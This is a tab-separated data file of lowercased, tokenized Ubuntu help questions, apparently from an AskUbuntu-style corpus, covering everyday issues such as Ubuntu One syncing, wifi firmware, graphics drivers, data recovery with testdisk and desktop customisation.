44552	can i customize how often ubuntu one syncs to the cloud ?	i sync my programming workspace to the cloud using ubuntu one . everything works pretty well , but since i modify and save many files quite frequently , ubuntu one is constantly syncing and gets backed up . is there any way to customize how often ubuntu one syncs to the cloud ? for example , have it only synchronize every half-hour ?
44557	how to format/partition sd card ?	how can i format or partition sd card in kubuntu ? is there an application with gui for this ?
44561	mounting error at boot	so recently i 've been having a strange issue where ubuntu kicks back an error stating there was an `` error mounting `` 0 '' `` and to press s to skip . this is what my fstab looks like . can anyone tell me exactly which lines/entries should be erased without doing any harm so it no longer attempts to mount `` 0 '' ?
44564	is there any `` personalized magazine '' -style application ?	i use zite on my ipad to create a `` magazine '' that changes according to my answer on whether i liked a certain article or not . is there something like that for ubuntu ?
44565	simple file does n't run ( command not found ! )	here in the screen shot , there is a window and terminal open . i am running on ubuntu 10.04 ( kernel 2.6 ) lts 64bit livecd session , and trying to run testdisk to recover my another formatted partition . but , whenever i run the sudo testdisk_static command , it says , command not found ! as you can see in the picture , this file ( testdisk_static ) exists . if i double click it nothing happens . its not running from terminal either . why this file does n't run ? what to do in this situation ?
44566	enable wifi on my computer - firmware missing	i am attempting to set up a wireless network on 11.04 , freshly download today . the router is on and working . however , i do not have a wifi `` card '' ( which i am assuming is a little usb-type thing that allows internet access , but correct me if i am wrong ) and every time i try to type in the mac address and everything , nothing works . i also get the `` firmware missing '' error when i scroll over the signal strength , which i have tried looking up but have been unsuccessful with completely understanding it . i guess my main question is do i need another little device to be able to use wifi on my ubuntu ? i do have an ethernet cable but another person is using it and i do not want to be tied down to that cable . the problem is that none of the wireless networks show up , however they show up when i go into windows mode on my laptop . i get an error message at the top saying `` firmware missing '' which i have tried looking up but still have no straight answer for .
44567	test blank cd/dvd ?	how would i test a blank cd/dvd + r to see if it 's good . i have a blank dvd that has a few light scratches on it and i want to see if it is able to burn a home movie onto it .
44569	what are the foss solutions for partition merging ?	what are the foss solutions for partition merging in ubuntu ?
44573	data recovery using testdisk failing !	i am trying to recover an accidentally formatted partition using testdisk , after selecting the partition [ pic 1 ] and selecting undeleted [ pic 1 ] , it says , no deleted file found . [ pic 2 ] 1 2 i know it 's a silly question , but i just want to make sure that those data are really out of reach . or is there anything i can do to recover them ? : ( i tried to repair my partition table using bootrec.exe/fixmbr & bootrec.exe/fixboot , can this be the reason why testdisk ca n't work anymore ? i have n't written anything on that partition . is there any low level approach to retrieve all the lost data ?
44578	how to really-really rescan media library in banshee ?	i made a few edits to track information in banshee 's file system queue playlist , and it appeared nice , however artists box ( in the middle of the screen ) contained old information ( as it was before my edit ) . i thought this would get fixed if i select tools - > rescan media library . i got a brief message with '100 % complete ' status , however list of artists ( which was modified and changed ) remains as it was . i have no clue what this means and how to really re-scan the library . i would appreciate your help ! thanks !
44579	one of my folders disappeared	my folder documents disappeared . i have to reinstall my ubuntu and now i do n't have access to my older folder . what i have to do ?
44580	show running windows in launcher quicklist ?	i love the quicklist for launchers , and that it shows if multiple windows are open via the arrow indicators . however , it does n't seem to list the running in the quicklist interface . is there anyway to have the unity launcher list the running windows ?
44583	which firefox.desktop prevails ?	if there is a firefox.desktop file in ~/.local/share/applications , does it override the firefox.desktop in /usr/share/applications ? if not , is there a way to make it do so ?
44587	why are my two ubuntu installs on separate partitions sharing the same apt-get data ?	i have two ubuntu installs on two separate partitions , one unity and one gnome-shell . they both use a common encrypted /home partition . that sort of setup has worked well for me in the past , but for some reason i 'm getting a lot of package management problems lately . when i use software center on my unity parition , it shows that i have installed the gnome3 ppa , which is only installed on my other partition . are these two partitions sharing the same apt-get data now ? that ca n't be right . if so , how can i fix this ?
44589	who loves unity interface over gnome ?	i recently upgraded to unity interface as part of upgrade from 10.10 to 11.04 . i liked everything in the new ubuntu version except the unity interface . even after spending 3-4 full days with unity what i can say is i did not like it at all . i hate to downgrade/switch to gnome since i feel i am not supporting unity and the philosophy of using always the best . this is what i found about unity : its fancy but not does not add any value ( at its current state ) harder to perform the operations compared to gnome very less customizable ( more like its forced on me , can not change much ) global ( shared ) menus are bad for mouse users since mouse has to travel long distances am i missing anything ? is the unity in 11.04 is very limited and has great plans in future ?
44590	remove password request after screensaver	how do i change my security settings ? i want to remove , only the password request that shows after the screen saver turns on . i 'm new with ubuntu and have not yet figured out were to find the security menu .
44594	`` destination host unreachable '' on ping	after network-manager could not connect to my router which has ip 192.168.1.1 . i set static ip for my interface . it connects but i can not ping . i get `` destination host unreachable '' whenever i ping from this particualar pc . i can ping and connect fine with same interface and router with my laptops when wired though . i have set interface ip as : auto eth0 iface eth0 inet static address 192.168.1.2 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 how can i make my pc connect with internet ? please help edit : ifconfig ip route ethtool traceroute the mii-tool one said unsupported .
44596	desktop edition to server edition and support	ubuntu desktop will receive 3 years of support , while ubuntu server will be supported for 5 years . well this is what ubuntu server faq says . so my question is can i change a desktop edition to server edition and change the support from 3 to 5 years ? i hope the support here means the packages update that ubuntu provides . correct me if i am wrong . if i can how do i do it ? its the support for lts release by the way .
44597	ubuntu one message appearing : you do not have permission ?	i am trying to sign in to ubuntuone on my droid 2. i keep getting a message that says the following : you do not have permission to open this page . x-ubuntuone-contacts : //syncml.one.ubuntu.com/ ? p=94768352 & u=48325096 any ideas why , and how to fix ?
44608	no sound out of macbook speakers & red led in headphone jack	i have recently installed ubuntu 11.04 on my macbook and after a few days i am now getting very low sound from the speakers as well a red led is glowing in the headphone jack . the sound is perfect if i connect my headphones but if i use the speakers there is no output . i have also installed windows and mac osx ( triple boot ) . the speakers work fine when i use either of them as well as there being no led . i have re-installed the ubuntu but then also the problem is not solved . fix : big thanks to vonhinten i met him on irc # ubuntu who helped me fixing this issue : ) to get the sound i added : options snd-hda-intel model=mbp55 to /etc/modprobe.d/alsa-base.conf to turn the red led off - try : amixer set iec958 off
44611	how to get ich ac97 audio controller to work under ubuntu server	i have installed ubuntu server 11.04 as a virtual box vm , which emulates the ich ac97 audio controller . mpg321 reports 'no default libao driver available' according to this page the driver for this device can be loaded at boot time by modifying 'loader.conf ' , but i can not find any such file on the system is the file called something else , or is it something that i need to create from scratch ? alternatively is there another way i can get the audio drivers installed ? i am getting the same problem with version 10 server , and also on a non vm machine with the same audio driver solution : install alsa-oss sudo apt-get install alsa-oss add the user to the audio group sudo adduser username audio log out and log in again finally run alsamixer and make sure that the master and pcm controls are not muted
44612	evolution notification for folders	i am using evolution mail client from my gmail account . whenever a mail arrives in inbox i get notification but if the mail arrives in some other folder then i dont receive notification . how can i receive notification for all my folder , even junk folder too . i am using ubuntu 11.04 thanks
44622	empty file keeps getting synced when i modify any file in a folder	i sync my ~/documents folder with u1 cloud . once i modify any file in this folder , instead of a new version there is an empty file with the same name as document upload on the server . and next time i log in , u1 tries to sync this empty file back to my ~/documents folder . as the result , i have an empty `` name.odt '' file and renamed to `` name.odt.u1conflict '' real document . problem appears after i update to the 11.04 .
44628	weird notification area bug with banshee	so in 10.10 , there was no problem with the notification area . but after upgrading to 11.04 , i got this weird system-colored background behind the music note banshee uses as the notification area icon . is there anyway to get rid of it ? thanks : )
44633	can i control which session i want to login at grub loading ?	is there a way by which i can choose if i want to login to ubuntu ( unity ) or ubuntu classic at grub loading it self . i have autologin enabled and i want to choose the session at the starting . or is there a way where i can change the script which is needed to load kernel and run other scripts which invokes gdm ?
44637	hide artha dictionary icon from notification area in classic interface ?	i 'm using artha dictionary , and all i want to do is hide its icon from the notification area without loosing its functionality ( i.e . ctrl+w to bring up the meaning of selected word and show the same using notifyosd. ) . the only reason why i want to do it is , artha 's icon is not monochrome and hence does n't integrate well with rest of the icons showing in the panel . while using unity , the icon is not shown and i still get proper notifications of word meanings i look up , the icon appears on panel in the classic mode . removing notification area from the panel also removes artha 's functionality . if icon can not be hidden , i 'll prefer to have a monochrome icon for artha that looks perfect on panel .
44638	where is the difference between using `pdfimages` from poppler-utils and using the one provided by xpdf-utils for image extraction ?	i need to extract a bunch of images from a pdf file . pdfimages should do the job . when trying to install , i got two alternatives poppler-utils and xpdf-utils so i wonder , whicht to choose . where are the differences , what are pros/cons of each alternative ?
44639	persistent notification for unity launcher icons	i was delighted to learn about the demands_attention flag as explained here : is there any way to initiate `` urgent animation '' of an icon on the unity launcher from command line ? however , that notification is very brief - meaning i wo n't notice when i step away from the keyboard for a minute . is there a way to make that notification persistent so the icon is animated until the respective window is focused again ?
44640	ca n't find how to change xbmc mouse speed	how can i change in xbmc mouse speed ? in ubuntu is fine but when i start xbmc it gets really much too fast ...
44641	ubuntu 11.04 hangs when try to resume from screen lock .	sometimes if i lock my ubuntu 11.04 screen , when i try to resume my work.. i see my pc hangs . the black screen does not go off . i can not even see the password prompt screen . i have to restart the pc . the same thing happens with my pc and my friends 's pc . my sytem ubuntu 11.04 ( natty ) intel ( r ) core ( tm ) 2 duo cpu e7400 @ 2.80ghz ( genuineintel ) 3982 mib ( memory ) has anyone come across this problem ?
44643	how can i change the color of the rectangle made by the mouse when i press ( and keep ) the left button ?	right now , in ambiance theme , when i left click somewhere and move the mouse ( while keeping it ) the rectangle that is made in order to choose files is orange . i would like it to be fully transparent or , even better , to have only borders *tag is not good , i could n't think of anything else though
44644	videos playing too fast	i am not sure if this is a ubuntu fault but i have ubuntu setup with lxde . just today , i found that videos on youtube plays too fast . i tried with daily motion , same thing . then tried to download trailers from apple . i get an error about segmentation fault . did something go wrong with ubuntu ? i saw a similar question then i also noticed that when videos fast forward , theres not sound too
44645	unable to ssh into a system	we have more than 500 systems running ubuntu . when i access a machine through ssh few machines are not getting logged in , rest of the machines are logging in successfully . i am entering the correct username and password . eventhough it is not getting connected . pls look at the below snapshot . pls see the output in the following link . http : //paste.ubuntu.com/611748/
44650	why does n't the search function in the unity dash ( 11.04 ) return the same results in nautilus search ?	when i use the unity dash to search for files it does n't return the same results as when i use the nautius search . i like the unity dash interface and would like to use that for searching instead . is this right ? should it be this way ? if not how do i fix it ?
44652	adding network printer in kubuntu 11.04 with printer account ?	i just migrated from ubuntu 10.10 to kubuntu 11.04 and ran into some trouble when i tried adding the office printer to the new installation . the printer is a konica minolta bizhub c253 network printer which requires an account number ( account track in windows ) when printing . what i have tried is the following : gone into system settings- > printer configurations , chosen new printer tried adding the printer as lpd , socket and ipp ( i was given an ip-adress to the printer , and an account number ) supplied the ppd file downloaded from konica minolta and finished adding the printer all this works , i have not been able to find any way to add the account number to the printer options though . this used to be possible to set below the finishing options in the printer options tab . any suggestions ? am i adding the printer as the wrong type of printer , or why are there no account options below the finishing options ?
44653	nvidia driver activated but not in use ( gtx280 )	i have nvidia gtx280 . using the 10.10 version i had no problem with it . but at 11.04 i keep getting the `` this driver is activated but not currently in use '' message . output of /usr/lib/nux/unity_support_test -p : not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity supported : yes also , all the effects of the windows have gone . i have found out that with compizconfig settings manager i can enable-some effects but after i do that the top panel sometimes vanishes or even the launcher . tried installing the simple compizconfig settings manager , i get this : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . when i click on `` details '' i get this : the following packets have unresolved dependencies : simple-ccsm also , from the nvidia x server settings : system information : linux-x86_64 nvidia driver version : 270.41.06 i checked at the nvidia site and saw that they have released an updated version of the driver . version is : 270.41.19 . i have downloaded a run file , how can i install it ? what can i do ? screenshot from additional drivers app : also , from the nvidia x server settings : system information : linux-x86_64 nvidia driver version : 270.41.06 i checked at the nvidia site and saw that they have released an updated version of the driver . version is : 270.41.19 . i have downloaded a run file . how can i install it ? ( i am new to ubuntu os : s ) also if it is wrong that i have bumped my question please advise me what can i do so that i can add these extra info about my problem .
44655	how do i stream my microphone via vlc ?	i 'm sure this is a quick one if you know it but i 'm stuck been searching around for a long while now . all audio works mic/spkers/skype etc ... which is great . what i am trying to do is get the mic to stream via vlc but for that i need to know the device as in /dev/video0 ( webcam ) but what is the same for the mic in on the sound card and how do i find that out ? under sound preferences > > input its listed under internal audio analogue stereo ( rear microphone ) cat /proc/asound/cards 0 [ intel ] : hda-intel - hda intel hda intel at 0xf9ffc000 irq 44 1 [ hd5001 ] : usb-audio - microsoft速 lifecam hd-5001 microsoft microsoft速 lifecam hd-5001 at usb-0000:00:1d.7-6.2.4 , high speed aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc662 rev1 analog [ alc662 rev1 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc662 rev1 digital [ alc662 rev1 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0
44656	changing the update server from india to main server : 404 not found	i recently installed ubuntu 10.04.2 server and like to upgrade the packages to the latest . unfortunately india based server errors out and would like to switch to main server . some snippet of errors are given below . get:32 http : //in.archive.ubuntu.com/ubuntu/ lucid-updates/main landscape-common 11.02-0ubuntu0.10.04.1 [ 227kb ] err http : //in.archive.ubuntu.com/ubuntu/ lucid-updates/main landscape-common 11.02-0ubuntu0.10.04.1 404 not found [ ip : 91.189.88.140 80 ] err http : //in.archive.ubuntu.com/ubuntu/ lucid-updates/main libavahi-common-data 0.6.25-1ubuntu6.2 404 not found [ ip : 91.189.88.140 80 ] err http : //in.archive.ubuntu.com/ubuntu/ lucid-updates/main libpq5 8.4.8-0ubuntu0.10.04 404 not found [ ip : 91.189.88.140 80 ] looks like some of the servers are down . where can i find the urls of main server to update in /etc/apt/sources.list ?
44659	how do you get the broadcom bcm4306 wireless card working ?	i 've done a fresh install of natty 11.04 . i have a broadcom bcm4306 wireless network card and it failed to come up . it said no drivers installed . after a bit of reading , i installed the b43-fwcutter and the firmware-b43-installer . now it will attempt to connect to the wireless network and asks for the wpa2 password . however after entering the correct password , it still wo n't connect and after a minute or so , it asks for the password again . i 've checked the additional drivers list as apparently after installation of the b43 driver it should be listed but there is nothing there . not sure if it matters but when i was installing i was connected on a usb wifi . this works without any additional drivers . anyone know how to get this card working ? thanks .
44660	how do i integrate git with emacs ?	what do i need to install to be able to do something like the lines below in ubuntu 11.04 ? m-x git-status git-commit-file command ( c key ) git pull git push
44665	how do i get notification for new mail in all folders in evolution ?	i am using evolution mail client from my mapi account . whenever a mail arrives in inbox i get notification but if the mail arrives in some other folder then i dont receive notification . how can i receive notification for all my folder . i am using 11.04
44671	syncing super users mail on a server to another pc ?	i have a headless ubuntu server on which i recieve super user 's mails to /var/mail/superuser folder . i want to sync that to my ubuntu pc and read it on evolution mail . how can it be done ?
44672	all of my files have disappeared from ubuntu one	i had photographs and documents stored online but everything has gone , i have logged into the website in my browser but there is no sign of anything . its not a problem as i backed up 99 % of the files to dvd but i am a bit concerned about how safe this service is before commit to it , are the files simply lost ?
44673	no route to host - proxy issue	in my office , proxy is enabled in my system .when i use wget for downloading , the terminal giving `` no route to host '' issue.but when i connect to the same site using browser , it is connecting.i 've configured the proxy settings in my browser.seems like i have to do some setting in my system . pls help
44675	ca n't execute .out files , getting permission denied	i have written a c++ program and complied it to produce a.out file . however , whenever i try to run it , i get permission denied . i read that we can use sudo , but i ca n't quite get it to work . i use something like , sudo `` ./a.out '' but that too does n't work . edit : here is the message i get when i try `` ./a.out '' . bash : ./a.out : permission denied
44678	how to add a shortcut on desktop	i am new to ubuntu and i am not quite familiar on how to add shortcuts on the desktop . i an experienced windows user and my intuitions did n't help to achieve this .
44680	how to change volume of pulseaudio playback-apps / -streams that are n't currently in use ?	i can change sound volumes with `` gnome-volume-control `` . but there are listed only playback-apps / -streams that are currently in use . in `` ~/.pulse `` -directory i found e.g . `` *-stream-volumes.tdb '' and `` *-device-volumes.tdb '' that could be the configuration files but i am unable to read or edit these files .
44681	clock disappeared from notification area	the clock in the notification area disappeared after i removed ubuntuone from my system and i cant figure out how to get it back . thanks
44686	transmission webui problem - conflict 409	i am running the latest stable version of transmission ( version 2.31 from the transmission ppa ) . any time i try to log in to the web user interface , i get hit with this : 409 : conflict your request had an invalid session-id header . to fix this , follow these steps : when reading a response , get its x-transmission-session-id header and remember it add the updated header to your outgoing requests when you get this 409 error message , resend your request with the updated header this requirement has been added to help prevent csrf attacks . x-transmission-session-id : cbcyiodnqihkykhr9ecezomw3icgmsgt6j2ftcoxbcuna1tk anyway , i 've had this problem with transmission for the last couple of versions , and i have n't been able to find an answer as to how to fix this anywhere online . if anyone has any ideas , let me know .
44695	how to fix install of python 2.5.4 ?	i tried to install python 2.5.4 on ubuntu 11.04 . i need to be able to remove my original installation of this older python , and then get instructions on installing . further , will i have to tell the system which python to use or will it figure it out ?
44698	keyboard command to resize window	the bottom of my ( chromium ) window is off the bottom of the screen . if i move the window up , unity maximises the window ( which i do not want ) . what keyboard combination can i press to make the active window shorter ( smaller ) ? thanks ,
44701	how can i make a folder read-only for just a specific application ?	past experience has taught me never to test out unfamiliar media players on my existing media library , lest nosy `` convenience '' functions automatically rearrange , re-tag , sloppily import into , or otherwise alter my carefully-curated data . how can i expose my music to such a player in a read-only fashion ?
44702	how to reduce font size of the header/footer in firefox print jobs ?	when printing from firefox , the font size of headers/footers ( title , url , page , date ) is noticeably larger in ubuntu when compared to windows . the larger font means less of the title and url headers show on the page . and it also takes away space from the page 's main content . is there a way to make the font smaller ? changing the `` content '' preferences in firefox to a smaller font size has no effect on the headers and footers . but regardless , i only want to reduce the font size of the headers/footers , not the page 's main content .
44704	display number of hours since a specific time in bash	i have a command that outputs a single date in whatever format i please . now i need a simple way of calculating ( with bash ) how many hours have passed since that date ( default is yyyy-mm-dd hh : mm ) . the only way i can think of doing this is by using several ifs , but i was hoping there might be a quick one-line method . perhaps using the date command ? just an example for clarity : right now it is 2011-05-23 12:16 . the first command outputs 2011-05-22 08:34 . i need a command ( or a few piped commands ) that output 27 , as in : `` 27 hours ( rounded down ) have passed since the specified date '' . is there a quick'n simple way to achieve that ? or am i bound to use conditionals ( not that it 'd be overly complex ) .
44709	how can i install haskell-platform ?	haskell-platform currently has unmet dependencies on ubuntu 11.04 . this is a known bug , but i 'd like to get it installed sooner rather than later . can anyone recommend a way to install haskell-platform on 11.04 ? the bug report that i linked to offers a solution that requires editing a binary package ( ? ) using vim , but i 'd rather install something from source than go that route .
44711	i can not install applications because i do n't know what to do with the authentication dialog	whenever i try to download an application , i 'm asked for authentication . with what ? a password ? i tried to use my ubuntu-one password but that did n't work .
44717	recommendation for petri nets modelling software ?	i 'm looking for a petri nets simulator with a graphical editor for ubuntu . does anyone know if there exists such a tool ?
44725	how can i queue file operations ?	when i pick and choose files to copy to or from a single device , nautilus accumulates file operations in parallel : i worry that in certain circumstances this could cause fragmentation of the destination device , or transfer slowdowns due to scattered reads on the source device and increased network connection overhead . how can i queue these file operations instead , so that each operation starts only after the previous one has finished ?
44726	what is a good setup for latex and r ?	i am not sure if this is the proper place for this question , so my apologies if it is not . i want to switch from windows to ubuntu , or at least have an additional operating system next to windows . i have tried ubuntu before but never really liked the text editors and r console i found . the main things i need to do is programming in r , compiling packages , compiling c++ ( with rcpp + inline ) and writing latex documents ( with sweave ) . so i was wondering : is ubuntu a good linux distribution for statistical programming ? what is a good text editor for ubuntu ? what is a good r console / ide for ubuntu ? what is a good latex editor / distribution for ubuntu
44728	can i create a unity url launcher for the applications lens ?	can i create an application launcher that is a url ? i would like to modify the application screen of my ubuntu dash to include icons that open links .
44730	can i set a default syntax highlighting in gedit ?	until you save a document in gedit , syntax highlighting is turned off . there are obviously good reasons for this -- people might get confused if certain words were randomly showing up in different colors . but for my purposes , i use gedit almost exclusively for html editing . a lot of times i paste snippets of code into a new gedit document for quick editing , and i have to manually set the syntax coloring to html . other times , i open coldfusion ( .cfm ) documents , which gedit apparently does n't recognize , and again i have to manually set the color to html . both of these inconveniences would be fixed if i could find a way to tell gedit to automatically use html syntax highlighting for new documents and documents without a recognized file extension . is this possible ?
44732	how are flags used in linux for file protection ?	i am unsure about the term flags used in linux as i have recently heard of them , whilst doing educational research . and from what i am aware of 'flags ' is they are used within directory 's to show the access permissions for a particular file . so my real question is , how are they used ? where can i see them myself ? and tell me if im missing something obvious then tell me , as i thinking this maybe the case . thank you for your time : )
44736	how to bulk rename files after modification date ?	i 've got some photos with quite random names , but the dates ( not exif , but when they were last edited ) are correct . i 'd like to rename them in that order , preferably so that the first photo is named `` 1.jpg '' and so on , but anything goes . anyone knows how that is done ?
44747	how can i create a hidden ad-hoc network ?	my laptop is hooked up to a wired connection and that is the only way to access the network . so i setup a wireless access point on my laptop via network manager so my phone could connect to it ( service is horrible here ) and it works great . the problem now is that i would like to hide the ssid but ca n't find any where to do so in network manager or iwconfig . anyone know if this is possible ?
44748	show visualization instead of album art in totem ?	how can i set totem to show the visualization instead of the album art when i am playing a sound track ?
44751	share adhoc connection with playstation 3	i 'm using a mobile internet connection on my ubuntu laptop , and i 'm sharing it ( wlan ) using adhoc . the problem seems to be that it only works using wep security , but my ps3 can not connect to , or even find , the shared wireless network . i 've tried using both `` wep 128-bit passphrase '' and `` wep 40/128-bit key ( hex or ascii ) '' , but niether works . is there something i can do to share my connection using wpa or is there an other solution ?
44753	upgrade from 10.10 to 11.04 broke ubuntu	i upgraded from 10.10 to 11.04 ( kernel 2.6.38-9 ) and now ubuntu wo n't fully boot . i get this message : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/mapper/isw_jhdfjbgej_volume01 does not exist . dropping to a shell ! which resulted in falling back to a busybox shell . if i do ls -l /dev/mapper i get : isw_jhdfjbgej_volume0 - > ../dm-0 isw_jhdfjbgej_volume0p1 - > ../dm-1 isw_jhdfjbgej_volume0p5 - > ../dm-2 i tried booting with an older kernel ( 2.6.35-28 ) and that worked ( except for x because the nvidia drivers were n't build ) and did ls -l /dev/mapper and i got : isw_jhdfjbgej_volume0 - > ../dm-0 isw_jhdfjbgej_volume01 - > ../dm-1 # my ext4 partition isw_jhdfjbgej_volume05 - > ../dm-2 # my swap partition so i sudo apt-get purge linux-image-2.6.38-9-common and then reinstalled nvidia-common for 2.6.35-28 ( dkms rebuild the module ) . then when i rebooted into 2.6.35-28 i got the same /dev/mapper/isw_jhdfjbgej_volume01 error that i got with 2.6.38-9 .
44755	how should i read a file of type `` text/calendar '' ?	i 've got a colleague who keeps sending me attached calendar items from an ms exchange server . thunderbird and mutt ca n't even see the attachment , but if i view the raw message source , it is there , encoded : content-type : multipart/alternative ; boundary= '' _002_80b708c9c67ae14ba396foo_ '' mime-version : 1.0 -- _002_80b708c9c67ae14ba396foo_ content-type : text/plain ; charset= '' iso-8859-1 '' content-transfer-encoding : quoted-printable =20 =20 -- _002_80b708c9c67ae14ba396foo_ content-type : text/calendar ; charset= '' utf-8 '' ; method=request content-transfer-encoding : base64 i can run the text/calendar portion through base64 -d and read it just fine , but now i have an external text file that looks like ... begin : vcalendar method : request prodid : microsoft exchange server 2010 version:2.0 begin : vtimezone tzid : eastern standard time begin : standard ... obviously , this is n't my problem . exchange is turning out poorly formatted email messages . nonetheless , the nature of this exchange is such that my life will be muuuch easier if i can just figure out a reliable way to read these invites . is there a tool i can use to actually read the calendar file ? there seem to be a few different date fields and i ca n't tell which is which . is there an automated way to push the file to evolution ?
44763	how do i install the game clanbomber ?	i love this game , but when i type clanbomber in ubuntu software center , it lists only granatier . i probably need to add some repository ?
44766	why is 's ' the 'w'orkspace switcher and 'w ' the 's'cale plugin ?	what is the rational behind these choices of shortcut keys ? super+s : workspace switcher super+w : scale i frequently press the wrong one since it seems backwards to me .
44769	ping option to know whether net is not in a proper way	i need the option of ping which , if the net is disconnected , the pinging need to be stopped.now if the net connection lost , it will wait and will continue after net came..
44780	having a problem syncing my files	when i try to access my cloud folders in the ubuntu one control panel i get this strange massage screenshot i cant seem to sync my files from my ubuntu one folder , the site works fine though.. any ideas ?
44781	how to format datetime indicator in unity 's panel to show in two lines ?	is it possible to format datetime indicator in unity3d to show in two lines ? i tried this : how-to-customize-indicator-datetime-to-two-line-configuration but that seems to work only when i run my ubuntu 11.04 in classic mode . when using ubuntu with unity3d this command shows itself in the panel and nothing is formated . i figured out that i can make it to show in two lines with `` % n '' between date and time but then font is too big and indicator is not fully visible . any idea how to format or at least change the font size ?
44783	linux installation copy & version upgrading	i had installed an ubuntu 10.04 to a pen drive of mine . now , i want to move it to a pen drive with bigger storage . but , how/what software should i use to do that ? is is possible to upgrade from 10.04 to 11.04 or 11.10 , without any problem ? i heard only lts supports upgrade among themselves , otherwise its not possible . is it true ?
44785	how do i permanently `` trust '' my router ?	whenever i access my router at https : //192.168.1.1 firefox complains that the security certificate is invalid . no amount of permanently storing an exception seems to change its mind . is there something i can do manually to address this ?
44788	can i `` confirm '' a remote access attempt from the command line ?	using vino with the `` you must confirm each access to this machine '' option checked , is it possible to be prompted and respond to the access request on the command line ? i want to ssh to the machine , enable remote access , and then be able to allow the vnc connection from the ssh session . in my tests so far , i have to be sitting at the machine to click on the dialog box that pops up .
44789	old kernel and recent cpu	this is my question , i 'd like to install ubuntu 10.04 lts on a laptop equipped with intel core i7 processor : does lucid kernel support the features of this cpu ? many thanks .
44793	what shutdown timers with/without gui are there available ?	what shutdown timers with/without gui are there available ? any type of action possible ? shutdown hibernate etc but also custom command ? how to set time ? time to go or at specific timestamp ? integration with desktop environment - progress bar to specified time warning before action - possibility to prolong/adjust/cancel ? keep default setting , eg 1 hour
44797	how to switch orientations of a bamboo tablet ?	i have a bamboo pen tablet and i use ubuntu 11.04 , and i just want to ask , how can i switch my tablet orientations .
44801	why does ubuntu still require restart after kernel updates when tools out there mean it 's unnecessary ?	a regular occurrence in updating ubuntu is kernel updates , which require a restart . there are applications which negate the need for a restart after a kernel update e.g . ksplice . why does n't ubuntu use tools similar to ksplice ? are there security , memory , etc . concerns to not restarting immediately/ever ? or , can these issues be overcome ( i.e . are they just bugs ) ?
44805	nautilus crashes	when i boot up ubuntu , the desktop is non-responsive ( as in the desktop area , not unity etc , only what nautilus covers ) and when i try and open nautilus it refuses to open . i have to kill it and then restart it for it to work . this works sometimes for a bit , sometimes it 's fine , sometimes it even locks the whole system up . i put a script to kill nautilus on startup , however this does n't work . this has happened 3 times today ( on 3 different installs , i reinstalled each time ) upon reboot after installation everything worked fine , it was only after updating did this problem occur . any ideas how to diagnose/fix this ? it 's driving me nuts -_- ( happens with nautilus and nautilus-elementary ) edit : it seemed the desktop works fine , until i launch nautilus , then everything starts to become unresponsive , memory leak ?
44806	anyone using kvm with spice protocol ?	i have a few kvm machines running in a ubuntu 10.04 64bits host ( all windows xp guest ) . i want to give a better desktop experience for the users ( now they 're using remote desktop to them ) and run the kvm with spice enabled ( so they can use spice client ) . i have it running in lab , and the experience is much better . do you guys have it running on your own , somewhere , in production.. etc with good results ? as i read , redhat and ibm are investing a lot in the spice protocol , and looks promising ( at least , right now , works very well ) . anyone ? thanks a lot ; - )
44807	copy & paste a file utility for terminal	i primarily use the terminal for file management and day-to-day tasks on my computer . there is one feature that i miss consistently and that is a copy/cut and paste for files ( not clipboard text ) . more specifically say i 'm organizing files and i need to copy several files to different locations on the drive , i would do something like cp /path/to/first/file /path/to/where/it/goes , when dealing with lots of files with long file-names it is a little bulky . its annoying especially if you are n't sure where the file is supposed to go ( i.e . which specific subfolder ) i was wondering if there is a utility similar to the copy/paste paradigm in most graphic file managers . i.e . you do something like copy file , navigate to the the directory you want and do paste file . rather than explicitly writing out the copy-to path as with cp above . i already have a rudimentary script that i wrote doing this , but i was wondering if there is an `` official '' or a fully-featured command line utility for this .
44810	how do i set the backup destination directory of bup ?	bup defaults to saving backups to ~/.bup . how can i tell it to save backups to my external drive ( /media/backups ) instead ?
44818	cpan apt repository ?	is there any apt repository corresponding to cpan ? currently , there only covers a few of cpan libraries in main and universe repositories . ( such as libfile-spec-perl , perl-tk , etc . ) i 'm going to add cpan dependencies in my deb packages . i ca n't install them by execute cpan -i xxx in post-install shell script because that will trigger a long , boring configuration process of cpan itself .
44825	how to re-add the 'home folder ' launcher item ?	i deleted the home folder launcher item , but now i wish to get it back . any idea ?
44826	how to remove an `` unallocated '' partition	i had windows partition on my hard drive , but i uninstalled vista , so i no longer need it . i 'm guessing i need to log in with a live cd , but when running drive utility and gparted on the cd , it showed a lock next to the drive , so it would n't let me modify it . any idea on how to remove a partition without formatting the drive ? thanks . : )
44830	how do i refer to a display with xinerama enabled ?	i 'd like to launch gnome-terminal on my second monitor , you 'd expect something like : ~ $ gnome-terminal -- display=0:0.1 to work but does n't as randr is disabled or not used when xinerama is enabled . the error i get when trying to launch with this command is : failed to parse arguments : can not open display : 0:0.1 i 've also tried : ~ $ export display= '' :0.0 '' ~ $ gnome-terminal -- display= $ display xlib : extension `` randr '' missing on display `` :0.0 '' . ** ( gnome-terminal:1818 ) : warning ** : failed to connect to the session manager : could not open network socket
44831	upgraded to 11.04 , now its not loading the normal way	i upgraded my laptop to the latest release of ubuntu and now its not loading the normal way from the grub menu . by normal i mean , picking the `` ubuntu '' option from the grub menu . to load ubuntu , i have to pick a new option showing up in grub named `` previous ubuntu version '' . why is it acting this way ? i have also attached the snapshot where the loading process just gets stuck .
44832	disabling login prompt and/or vga output	on a network appliance i am building , based on ubuntu server i wish to perform the following customizations : disable the vga output so if one connect a screen nothing will appear . this however shall not affect the ability to connect to the machine with ssh and control it if that is not possible without re-compiling the kernel ( action i wish to avoid as much as possible ) , i at least want that when machine boot completes , it will not show the login prompt , rather my own custom message . how can i get either one of the above options
